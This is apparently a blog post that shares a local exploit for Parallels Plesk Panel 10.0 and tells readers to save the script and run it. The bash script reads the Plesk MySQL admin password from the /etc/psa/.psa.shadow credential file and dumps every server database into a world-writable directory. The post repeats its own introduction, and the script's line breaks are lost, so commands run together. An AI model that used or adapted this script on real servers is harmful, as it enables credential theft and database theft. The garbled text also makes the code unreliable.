Parallels Plesk Panel => Linux local MySQL backup generate exploit
Today i've seen another exploit in Parallels Plesk coded By Cold Z3ro it give you the right to make a MYSQL Backup of all server Databases
also access to old backup taken before
Code of 3xpl0it :
See the Attachment
save it as exploit.sh
then just use this command to run it
Today i've seen another exploit in Parallels Plesk coded By Cold Z3ro it give you the right to make a MYSQL Backup of all server Databases
also access to old backup taken before
Code of 3xpl0it :
Code:
#!/bin/bash
# Title: Parallels Plesk Panel => Linux local MySQL backup
generate exploit# Version: 10.0 and possibly below and higher# Vendor
: http://www.parallels.com/# About : Parallels Plesk Panel is the
preferred choice for hosting service providers,# web
designers, and website owners.# Author: Cold z3ro#
Web: http://www.hackteach.org# Exploit : attacker could
infiltrate/intrusion to make MySQL database backup, also access to old
backups taken before.
# dumpdir automatically generated when install pleask with 0777.
dumpdir='/var/dbdumps/'date=$(/bin/date +%HHours%m-%d-%Y)mkdir -p
$dumpdir$dateecho "Creating MySQL backup in $dumpdir$date .."
for i in `mysql -u admin -p$(cat /etc/psa/.psa.shadow) -Ns -e "show
databases" | egrep -v
"^(psa|mysql|horde|information_schema|phpmyadmin.*)"`; do mysqldump
--opt $i > $dumpdir$date/$i.sql; echo "Created: $i.sql"doneecho
"Backups located in $dumpdir$date"# fetching the database'sls -1
$dumpdir$date
See the Attachment
save it as exploit.sh
then just use this command to run it
Code:
sh exploit.sh
Post a Comment